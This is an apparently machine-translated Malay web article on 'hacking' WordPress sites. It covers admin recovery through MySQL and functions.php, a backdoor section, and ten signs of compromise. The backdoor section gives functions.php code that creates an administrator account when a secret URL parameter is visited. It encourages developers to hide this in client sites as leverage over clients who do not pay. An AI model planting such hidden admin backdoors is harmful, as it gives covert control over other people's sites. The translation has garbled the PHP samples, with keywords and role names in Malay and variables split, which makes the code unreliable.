Cara Meretas Ke Laman Web WordPress, Panduan Lengkap

Cara meretas laman web WordPress, panduan lengkapnya


Kami tidak memaafkan, menyetujui, atau mendorong sebarang tingkah laku haram atau berniat jahat! Tujuan artikel ini adalah untuk menjelaskan cara menggodam atau mendapatkan kembali akses ke laman WordPress milik anda, atau bahawa anda mempunyai hak untuk menyunting, pentadbir dan akses. Apa sahaja yang anda lakukan, anda melakukannya sendiri. Kami tidak bertanggungjawab atas tindakan anda. Panduan ini hanya berfungsi untuk tujuan pendidikan.

Kaedah yang dijelaskan akan membantu anda mendapatkan kembali akses ke laman web walaupun anda tidak lagi mempunyai akaun, tetapi memerlukan beberapa maklumat mengenai laman web tersebut dan mereka tidak akan membantu anda meretas pemasangan WordPress secara rawak.

Dalam panduan ini, kami akan menunjukkan kepada anda:

 • Cara meretas laman web WordPress
 • Cara membuat pintu belakang di WordPress
 • Cara membuat akaun pengguna baru melalui FTP
 • 10 tanda laman web WordPress anda digodam

Cara meretas laman web WordPress, panduan lengkapnya

Situasi yang boleh anda bantu

Sekiranya anda berada dalam salah satu situasi berikut, kaedah kami akan membantu anda mendapatkan kembali akses:

 • anda lupa nama pengguna atau alamat e-mel
 • pilihan menetapkan semula kata laluan tidak berfungsi pada pelayan hosting
 • tetapan semula e-mel kata laluan tidak dihantar
 • anda tidak lagi mempunyai akses ke alamat e-mel akaun
 • anda tahu nama pengguna & kata laluan, tetapi gabungannya tidak berfungsi

Untuk menggunakan kaedah yang dinyatakan di bawah, anda memerlukannya hanya satu perkara berikut:

 • Akses FTP ke pelayan, atau
 • Akses cPanel ke pelayan, atau
 • akses ke pangkalan data MySQL dan keupayaan untuk menyambung ke jarak jauh

Kaedah # 1 – cara MySQL

Gunakan kaedah ini untuk menukar kata laluan (atau nama pengguna jika diperlukan) pengguna yang ada atau untuk membuat akaun baru. Anda memerlukan akses cPanel atau mengarahkan akses MySQL ke pangkalan data laman web. Mari mulakan dengan menukar kata laluan pengguna yang ada.

Sekiranya anda menggunakan cPanel, log masuk (cPanel selalu dapat diakses melalui https://yoursite.com:2083 pautan), cari dan buka phpMyAdmin. Senarai pangkalan data dan jadual ada di sebelah kiri. Anda mencari jadual yang berakhir di _pengguna. Mungkin begitu wp_pengguna, tetapi jika anda mempunyai lebih daripada satu laman WordPress yang dipasang di pelayan, anda mesti mencari yang betul.

Jadual yang betul akan mempunyai pengguna yang ingin anda edit di dalamnya. Ikuti prosedur yang sama jika anda menyambung ke MySQL melalui beberapa klien luaran seperti SQLyog. Sebaik sahaja anda mencari jadual dan rekod pengguna sebenar, sudah tiba masanya untuk menukar kata laluan.

Seperti yang mungkin anda ketahui sekarang, kata laluan disimpan di user_pass medan, dicincang menggunakan algoritma MD5. Buka penjana MD5 dalam talian masukkan kata laluan yang anda mahu gunakan dan klik “Hash”. Salin rentetan yang dihasilkan dan ganti kata laluan asal dengannya. Di phpMyAdmin, anda boleh mengedit medan dengan mengklik dua kali padanya. Prosedurnya serupa dengan pelanggan MySQL yang lain. Simpan perubahan dan log masuk ke WordPress dengan kata laluan baru anda.

Jadual pengguna WP

Nama pengguna, kata laluan hash dan e-mel disimpan di wp_pengguna jadual pangkalan data

Masih menggunakan kaedah # 1 – mencipta pengguna baru

Membuat pengguna baru sedikit lebih rumit tetapi masih dapat dikendalikan dalam masa kurang dari satu minit. Buat rekod baru dalam jadual pengguna dan isi: user_login, user_pass (hashed, menggunakan fungsi MD5 yang dijelaskan di atas) dan user_email. Semua medan lain boleh kekal kosong; mereka tidak penting. Simpan rekod baru. Setelah disimpan, MySQL akan memberikannya ID unik. Ini nombor di medan ID. Ingatlah.

Sekarang pergi ke _usermeta meja. Ingatlah, awalan jadual mestilah sama dengan awalan pengguna. Contohnya wp_pengguna dan wp_usersmeta. Sekiranya awalan tidak sama, anda mengedit jadual yang salah (dari beberapa pemasangan WP lain) dan akaun baru tidak akan berfungsi. Kami akan membuat dua rekod baru. Abaikan umeta_id padang untuk mereka berdua. Tetapkan ID Pengguna medan ke nilai yang baru anda ingat (nilai ID baru dalam jadual pengguna). Untuk set rekod pertama meta_key ke wpct_user_level dan nilai meta_ ke 10. Untuk yang kedua meta_key ke wpct_capabilities dan nilai meta_ ke a: 1: {s: 13: "pentadbir"; b: 1;}. Selamatkan kedua-duanya. Anda sudah selesai – log masuk!

Kaedah # 2 – cara functions.php

Pendekatan ini dapat digunakan baik dengan mengedit function.php melalui cPanel atau dengan menggunakan klien FTP untuk melakukannya. Sekiranya menggunakan cPanel cari Pengurus Fail dan buka. Pertama, kita mesti mencari folder tema aktif.

Pergi ke public_html / wp_content / tema folder. Sekiranya anda melihat tema anda dengan segera dan tahu yang mana satu – hebat. Buka foldernya dan mulakan penyuntingan fungsi.php. Sekiranya tidak, buka laman web, klik kanan di mana sahaja, pilih “Lihat sumber”. Kemudian tekan Ctrl + F dan mula menaip /tema/ tidak lama lagi anda akan mempunyai banyak URL yang diserlahkan, dan anda akan mengenali nama folder tema aktif.

Cari di struktur fail, buka, dan mulakan penyuntingan fungsi.php. Salin / tampal kod berikut di akhir fail. Fikirkan penutupan ?> Teg PHP jika anda memilikinya. Mereka mesti berada di barisan terakhir. Oleh itu, masukkan kod di hadapan mereka.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

jika (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = WP_User baru ($ user_id);
$ user-> set_role ('pentadbir');
}

Edit hanya dua baris pertama kod untuk menggambarkan akaun baru anda. Sekiranya sudah ada pengguna di WP dengan e-mel itu, akaun baru tidak akan dibuat, jadi pastikan ia baru. Tukar kata laluan juga – jangan digodam oleh anak-anak skrip. Setelah menyimpan fail, buka laman web anda, kodnya akan dijalankan, akaun baru dengan hak pentadbir dibuat dan anda dapat log masuk dengannya.

Selepas anda melakukannya, ingatlah untuk menghapus kod dari fungsi.php.

Kaedah penggodaman lain

Dengan mengetahui kata laluan FTP, cPanel atau MySQL, anda membuktikan bahawa anda mempunyai akses sah ke pelayan dan oleh itu anda juga harus mempunyai akses ke pemasangan WordPress. Sekiranya anda tidak mempunyai akaun tersebut, maka Anda tidak akan berjaya (meretas laman orang lain), dan itu tidak bagus!

Ingatlah bahawa mendapatkan akses tanpa izin ke komputer, laman web atau pelayan mana pun adalah suatu jenayah yang serius dan segera ditangani di kebanyakan negara.

Sekiranya anda takut laman web WordPress anda dapat diretas, sila periksa halaman ini dengan pengimbas keselamatan WordPress percuma. Sekiranya anda tidak mempunyai masa untuk menyediakan blog anda, biarkan kami melakukannya untuk anda.

Cara membuat pintu belakang di WordPress

Apabila pintu depan ditutup, anda mungkin mencuba pintu belakang. Ini mungkin terdengar seperti cara jahat menggunakan kod untuk memasuki laman web tanpa mengaksesnya, tetapi sebenarnya ada kalanya anda perlu mengawal laman web anda sendiri jika ada yang mencurinya.

Sekiranya membuat laman web untuk orang lain sesuatu yang anda lakukan, lambat laun akan ada pelanggan yang akan menolak untuk membayar anda untuk pekerjaan anda; pelanggan yang akan memadamkan maklumat log masuk anda dan mengambil alih kawalan semua yang telah anda lakukan. Kadang-kadang, cukup untuk membuat pengguna baru melalui FTP atau menetapkan semula kata laluan. Apabila itu tidak mencukupi, anda mungkin ingin meretas jalan masuk atau membuat akses pintu belakang ke halaman pentadbir anda.

Tetapi jika anda memutuskan untuk menyembunyikan sebilangan kecil kod di persekitaran WordPress anda, anda mungkin dapat menyelamatkan maruah diri anda dan dapatkan akses ke laman WordPress dengan hak pentadbir. Dan di situlah permainan dimulakan.

Tidak kira berapa kali pencuri ini menghapus maklumat anda atau memulihkan sandaran pada pelayan yang mungkin dimilikinya, ada kemungkinan dia tidak tahu apa-apa mengenai pintu masuk pintu belakang. Sekiranya dia melakukannya, dia mungkin tidak memerlukan bantuan anda dalam menyiapkan WordPress, betul?

Buat pintu belakang:

OK, cukup dengan ceramahnya; berikut adalah sekeping kod yang perlu anda selesaikan:

 1. Buka fail functions.php
 2. Salin / Tampal kod berikut:
 3. add_action ('wp_head', 'wploop_backdoor');
  fungsi wploop_backdoor () {
  Sekiranya ($ _GET ['backdoor'] == 'knockknock') {
  memerlukan ('wp-include / registration.php');
  Sekiranya (! Username_exists ('username')) {
  $ user_id = wp_create_user ('name', 'pass');
  $ user = WP_User baru ($ user_id);
  $ user-> set_role ('pentadbir');
  }
  }
  }
  ?>
 4. Simpan perubahan

Sekiranya anda meninggalkan kodenya sebagaimana mestinya, yang perlu anda lakukan untuk membuat pentadbir baru di laman web ini ialah lawati http://www.domainanda.com/?backdoor=knockknock

Setelah halaman dimuat, nama pengguna baru anda adalah “Nama” dan kata laluan “Lulus”.

Sudah tentu, anda boleh mengubahnya dalam kod di atas dengan menukar ‘nama’ dan ‘lulus’ kepada apa sahaja yang anda mahukan. Anda juga boleh menukar pautan ke pintu belakang anda dengan menukar ‘pintu belakang’ dan / atau ‘ketukan’ ke apa sahaja yang anda hasilkan.

Cubalah fungsinya – bukan hanya itu menyeronokkan tetapi juga dapat membantu anda suatu masa nanti apabila anda akan membuat laman web untuk seseorang yang tidak dapat anda percayai sepenuhnya. Anda juga harus meningkatkan kemahiran WordPress dan blog anda.

Cara membuat akaun pengguna baru melalui FTP

Membuat akaun pengguna baru di WordPress sangat mudah. Sebagai pentadbir, anda perlu arahkan ke halaman pentadbir Pengguna di mana anda boleh membuat akaun baru untuk sebarang peranan pengguna. Perkara itu dapat dilakukan dalam hitungan detik dan pengguna yang baru dibuat dapat segera log masuk dengan nama pengguna dan kata laluan yang diberikan.

Tetapi apa yang berlaku jika anda kehilangan akses ke pentadbir WordPress anda? Perkara mungkin menjadi lebih rumit, tetapi jangan risau – kami mempunyai fungsi untuk anda yang dapat menyelamatkan nyawa pentadbir anda.

Sama ada pentadbir lain menghapus akaun anda, sama ada anda telah menghapus semua pengguna dari pangkalan data secara tidak sengaja, menggunakan pemalam yang tidak berfungsi atau diretas, anda masih dapat mengawalnya. Kadang-kadang anda mungkin hanya mendapat akses ke pelayan FTP anda sementara yang HTTP akan berada di luar jangkauan anda dan anda perlu membuat pentadbir baru. Walaupun ini merupakan kes yang jarang berlaku, fungsi berikut akan menyelamatkan anda.

Untuk membuat akaun baru di luar persekitaran pentadbir WordPress, semua yang anda perlukan adalah akses FTP ke laman web anda. Sebagai pentadbir, anda harus mempunyai semua maklumat yang diperlukan untuk log masuk ke pelayan anda dan anda boleh membuat akaun baru dengan cepat dengan membuat fungsi baru dalam tema anda.

Buat akaun pengguna baru melalui FTP:

 1. Buka klien FTP dan sambungkan ke akaun anda
 2. Navigasi ke wp-content / tema
 3. Buka folder tema yang anda gunakan
 4. Cari fail functions.php dan edit
 5. Salin dan tampal fungsi berikut:
 6. fungsi admin_account () {
  $ user = 'Nama Pengguna';
  $ lulus = 'Kata Laluan';
  $ e-mel = '[email protected]';
  jika (! username_exists ($ user) &&! email_exists ($ email)) {
  $ user_id = wp_create_user ($ pengguna, $ lulus, $ e-mel);
  $ user = WP_User baru ($ user_id);
  $ user-> set_role ('pentadbir');
  }}
  add_action ('init', 'admin_account');
  
 7. Tukar nama pengguna, kata laluan, dan e-mel kepada sesuatu yang unik
 8. Simpan perubahan

Pastikan nama pengguna, kata laluan dan alamat e-mel yang anda tetapkan dalam fungsi itu unik atau sebaliknya fungsi tidak akan berfungsi dengan baik. Setelah menyimpan perubahan, anda akan selesai dan anda boleh menavigasi ke panel log masuk WP anda. Gunakan maklumat baru untuk masuk semula dan setelah anda mengesahkan akaun, anda boleh menghapus fungsi dari fail functions.php.

Fungsi yang ditunjukkan di atas membuat akaun admin tetapi anda boleh mengubahnya dengan mudah untuk membuat akaun dengan peranan pengguna lain. Secara sederhana menukar peranan pada 8ika barisan kod kepada editor, pengarang, penyumbang, pelanggan atau peranan pengguna lain yang telah anda buat.

Malangnya, jika anda kehilangan akaun pentadbir, anda juga akan kehilangan semua catatan yang ditulis di bawah nama pengguna tersebut. Itulah sebabnya anda harus selalu menyimpan cadangan yang boleh anda dapatkan dengan mudah. Sekiranya anda membaca ini semasa mempunyai akaun pentadbir anda, mengambil ini sebagai peringatan untuk membuat sandaran dengan segera dan tandakan artikel ini sekiranya anda perlu membuat akaun di luar WordPress pada masa akan datang.

10 tanda laman web WordPress anda digodam

WordPress adalah platform blogging yang besar. Terdapat berjuta-juta pengguna dan nampaknya jumlahnya bertambah dengan cepat setiap hari. Bahkan orang cenderung untuk memindahkan laman web mereka yang dibuat dalam sistem pengurusan kandungan lain ke sistem sumber terbuka ini lebih kerap daripada yang anda fikirkan. Walaupun ini bagus, ini bermakna penggodam juga akan meletakkan WordPress di tempat nombor satu ketika cuba menyerang laman web rawak.

Biasanya, jika anda diretas, anda akan mengetahui tentangnya dengan serta-merta. Laman web anda akan menjadi tidak dapat diakses; anda tidak akan dapat log masuk dan kadangkala penggodam akan meninggalkan mesej di halaman depan. Tetapi lebih kerap daripada tidak, anda mungkin tidak menyedari bahawa sesuatu telah berubah. Dalam bahagian artikel ini, kami akan menunjukkan kepada anda beberapa tanda yang mungkin menunjukkan kepada anda bahawa laman WordPress anda digodam dan beberapa penyelesaian untuk masalah tersebut.

1. Log masuk tidak berjaya

Tanda ini cukup jelas. Sekiranya anda telah menggunakan kombinasi nama pengguna dan kata laluan untuk sementara waktu tanpa menghadapi masalah, anda mungkin akan curiga sekiranya tiba-tiba WordPress tidak mengenali akaun anda. Sekiranya penggodam masuk ke laman web anda, kemungkinan dia akan cepat menukar hak pentadbir anda.

Mungkin dia harus menukar kata laluan anda atau menghapus sepenuhnya akaun anda. Sebelum anda mula panik setelah kali pertama WordPress memaklumkan anda tentang nama pengguna / kata laluan yang salah, harap fikirkan fakta bahawa anda mungkin memasukkan kombinasi yang salah atau anda mungkin telah menghidupkan butang tutup kunci.

Penyelesaian: Cuba pulihkan kata laluan melalui e-mel atau gunakan akaun lain untuk log masuk. Untuk memastikan bahawa log masuk anda tetap selamat, kami mengesyorkan memasang Log masuk Ninja pemalam untuk WordPress.

2. Kandungan berniat jahat ditambahkan ke laman web anda

Laman web mengandungi amaran malware

Sekiranya anda mula melihat kandungan yang tidak dikenali di laman web anda, anda mungkin mula risau. Apabila mereka berpeluang memasuki kawasan pentadbir anda, penggodam dapat mengubah inti anda dan fail tema dan pemalam anda. Itu bermaksud bahawa mereka dapat mengubah apa sahaja yang mereka mahukan.

Walaupun beberapa penggodam secara drastik akan mengubah rupa laman web anda dan mungkin juga menyatakan bahawa anda telah diretas, yang lain akan menjadi lebih halus mengenainya.

Penyelesaian: Cuba cari kandungan tersembunyi dalam kod laman web. Mungkin ada pautan ke laman web pengganggu yang ditanam di footer laman web anda, atau mereka mungkin memasang pop timbul yang akan dibuka secara berkala kepada pelanggan anda. Gunakan Security Ninja untuk mengimbas laman web anda atau memantau laman web anda secara berterusan untuk masalah tersebut.

3. Lawatan mencurigakan

Sekiranya anda tidak menjejaki laman web anda, anda harus segera melakukannya. Cara mudah untuk dilakukan adalah menggunakan Google Analytics yang, di antara banyak ciri lain, dapat memberitahu anda berapa banyak kunjungan yang anda dapat dan dari mana datangnya lawatan tersebut. Selepas beberapa lama, anda akan mengenali laman web anda. Itu bermaksud bahawa anda akan tahu dari mana datangnya lawatan, anda akan tahu kapan anda melancarkan kempen baru dan kapan ada pautan promosi baru yang dikeluarkan di alam liar.

Tetapi jika anda tiba-tiba menyedari bahawa laman web anda mendapat sejumlah besar lawatan baru dari domain yang mencurigakan, anda ingin menyiasatnya lebih jauh kerana laman web anda mungkin akan diretas. Biasanya, lawatan seperti itu akan menghasilkan kadar pantulan 100% yang bermaksud hanya satu halaman yang diakses. Penggodam akan sering menggunakan sistem automatik yang akan membawa laman buruk lain ke milik anda. Sama ada kod buruk yang dilaksanakan di laman web anda atau anda telah menjadi sebahagian daripada rangkaian spam, perkara boleh menjadi serius, dan anda mesti memeriksa laman web anda untuk mengetahui kod jahat.

Penyelesaian: Gunakan Alat Webmaster Google untuk mencari domain yang mencurigakan

4. Kejatuhan lalu lintas secara tiba-tiba

Melayari status Ssite selamat

Tidak seperti tanda terakhir yang digodam, ini mungkin memberi amaran kepada anda kerana tiba-tiba penurunan jumlah lawatan. Daripada merujuk lawatan baru kepada anda, penggodam mungkin menghantar lawatan dari laman web anda. Ini mungkin berlaku kerana penggodam mengalihkan laman web anda ke laman web lain. Sebab lain untuk mendapatkan lebih sedikit pelawat ialah Google menyenarai hitam laman web anda. Tindakan ini akan menunjukkan mesej kepada setiap pengguna yang mungkin memilih untuk tidak membuka laman web anda kerana dijangkiti.

Penyelesaian: Gunakan Google Status Laman Web Melayari Selamat untuk memeriksa sama ada laman web anda ditandai sebagai tidak selamat dan kini berbahaya untuk dikunjungi.

5. Hasil carian mesin pelik

Sekiranya anda tidak melihat perubahan di laman web anda, tetapi anda mendapati bahawa hasil carian di Google dan mesin carian lain adalah pelik (tunjukkan tajuk yang berbeza dan meta-data lain), ini mungkin merupakan tanda jelas dari laman web yang diretas. Penggodam mungkin telah mengubah kandungan anda dengan cara yang hanya dapat dilihat oleh seorang pakar. Namun, perubahan akan dapat dilihat pada hasil mesin pencari.

Penyelesaian: Periksa laman web anda dengan Alat Webmaster Google, dan periksa sama ada laman web anda digodam dengan ini alat dalam talian percuma.

6. Anda tidak dapat menghantar / menerima e-mel

Setelah penggodam mendapat akses ke laman web anda, dia mungkin akan menginginkannya gunakan pelayan anda untuk menghantar spam kepada orang lain. Apabila anda mengetahui bahawa anda tidak dapat mengirim atau menerima e-mel baru dari WordPress anda, ini boleh menjadi tanda jelas bahawa anda telah diretas. Periksa e-mel anda sekali lagi, kemudian periksa dengan penyedia anda untuk memastikan bahawa tidak ada kesalahan.

Penyelesaian: Uji WordPress anda fungsi mel dengan pemalam percuma ini.

7. Laman web tidak wujud

Server tidak dijumpai

Ada kalanya penggodam tidak akan mengakses laman web anda untuk menanam kod jahat, mengarahkan pengguna atau menggunakan e-mel anda untuk spam. Kadang kala, semua yang mereka mahu lakukan adalah merosakkan laman web anda. Jarang sekali, penggodam akan berjaya memadam segala-galanya dari seluruh pelayan. Itulah sebabnya penting bagi anda menghoskan fail anda di syarikat hosting terkenal yang akan menjaga keselamatan dan juga menyimpan sandaran laman web anda setiap hari atau sekurang-kurangnya setiap minggu. Adalah amalan yang baik bahawa anda juga membuat sandaran sendiri dari semasa ke semasa supaya laman web dapat dipulihkan dengan cepat.

Penyelesaian: Pasang salah satu plugin terbaik untuk pengurusan sandaran di WordPress.

8. Fail yang mencurigakan

Sama dengan kandungan berniat jahat yang mungkin ditambahkan ke fail yang ada, penggodam mungkin menanam fail tambahan di mana sahaja dalam folder root anda. Adalah baik untuk mengetahui jalan keluar WordPress, tetapi jika anda tidak berpengalaman, anda harus mempunyai alat keselamatan yang dapat memeriksa semua fail dan aktiviti anda. Baru-baru ini, kami mengkaji Security Ninja yang merupakan alat yang sempurna untuk memeriksa semua fail WordPress anda.

Penyelesaian: Cuba cari fail yang bukan milik pemasangan WordPress anda. Gunakan Security Ninja untuk mengimbas laman web anda secara berkala dan mencari fail tersebut secara automatik. Kemudian hapus fail atau hapus kod jahat dari fail yang dijangkiti. Jangan lupa tambahan Core Scanner untuk Security Ninja.

9. Ahli baru

Bergantung pada laman web anda, anda mungkin satu-satunya yang dapat menambahkan ahli baru. Sekiranya demikian, e-mel yang memberitahu anda tentang pengguna yang baru mendaftar mungkin mencetuskan penggera. Sekiranya terdapat pentadbir lain yang mempunyai kemampuan untuk menambahkan ahli baru, tanyakan kepada mereka mengenai aktiviti yang mencurigakan.

Penyelesaian: Ubah URL masuk dengan plugin percuma, hadkan akses ke halaman log masuk WordPress anda dengan menggunakan fail .htpasswd dan gunakan Login Ninja untuk melindungi borang masuk anda sepanjang masa.

10. Lihat acara yang dijadualkan di pelayan anda

Kadang kala, penggodam tidak akan melakukan apa-apa pada laman web anda setelah mereka berjaya masuk. Sebaliknya, mereka akan meninggalkan acara yang dijadualkan yang mungkin membahayakan laman web anda pada masa akan datang. Teknik ini berbahaya kerana penggodam dapat meninggalkan mangsa yang tidak berpengalaman pada mulanya. Anda mungkin dijangkiti dan tidak tahu mengenainya.

Penyelesaian: Periksa pekerjaan CRON anda di pelayan yang anda gunakan dan pastikan tidak ada tugas yang dijadwalkan yang mencurigakan.

Mengakhiri

Kami berharap artikel ini dapat membantu anda mengurus laman WordPress yang lebih selamat, dan ia akan membantu anda mendapatkan semula akses ke dalam keadaan buruk. Dan walaupun laman web anda bersih, jangan anggap begitu.
Sentiasa pastikan bahawa blog anda seaman mungkin. Kami mencadangkan pemalam keselamatan untuk WordPress yang paling banyak dapat menjimatkan anda. Namun, jangan menjadi yang menggunakan kata laluan yang tidak selamat, dan berhati-hatilah semasa meretas laman WordPress anda sendiri.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
  Like this post? Please share to your friends:
  Adblock
  detector
  map